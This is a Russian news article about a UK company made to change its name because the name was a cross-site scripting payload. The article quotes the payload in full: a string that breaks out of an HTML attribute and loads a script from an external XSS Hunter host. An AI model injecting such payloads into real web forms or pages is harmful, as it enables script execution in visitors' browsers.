Sostav.ru
09.11.2020 в 17:35

Британской компании пришлось сменить название, которое содержало код для взлома сайтов

После вынужденного ребрендинга она стала «Компанией, в названии которой были HTML-теги»

Регистрационная палата Великобритании обязала одну из местных компаний сменить название, содержавшее HTML-код, который мог быть использован для взлома сайтов, пишет The Guardian.

Первоначальное название ''><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD содержит код для межсайтового скриптинга (XSS). При подобной атаке на веб-страницу внедряется вредоносный код, который выполняется на компьютере пользователя после открытия страницы. Затем с кодом может взаимодействовать веб-сервер злоумышленника.

Так как в этом случае название компании начиналось с кавычки, любой сайт, который не смог должным образом обработать HTML-код, мог ошибочно решить, что название компании пустое, а затем загрузить и выполнить сценарий с помощью XSS Hunter, инструмента, который помогает разработчикам находить ошибки, связанные с межсайтовым скриптингом, разъясняет The Guardian.

Компания по была создана программистом, который посчитал подобное название забавным для его консалтингового бизнеса. «Правительственная цифровая служба (GDS) имеет хорошую репутацию в области безопасности, другие компании с подобными шутливыми названиями уже регистрировались, поэтому я не думал, что это станет проблемой», ― сказал он.

Теперь компания называется THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD («Компания, в названии которой были HTML-теги»).

Вынужденный ребрендинг пришлось провести и креативному агентству из США. Компания должна была называться 3VE. Однако нейминг случайно совпал с названием крупнейшего бот-нета 3VE, и Goggle отменил регистрацию со ссылкой на ФБР.

Обсудить с другими читателями:
Ваш браузер устарел
На сайте Sostav.ru используются технологии, которые не доступны в вашем браузере, в связи с чем страница может отображаться некорректно.
Чтобы страница отображалась корректно, обновите ваш браузер.
Ваш браузер использует блокировщик рекламы.
Он мешает корректной работе сайта. Добавьте сайт www.sostav.ru в белый список.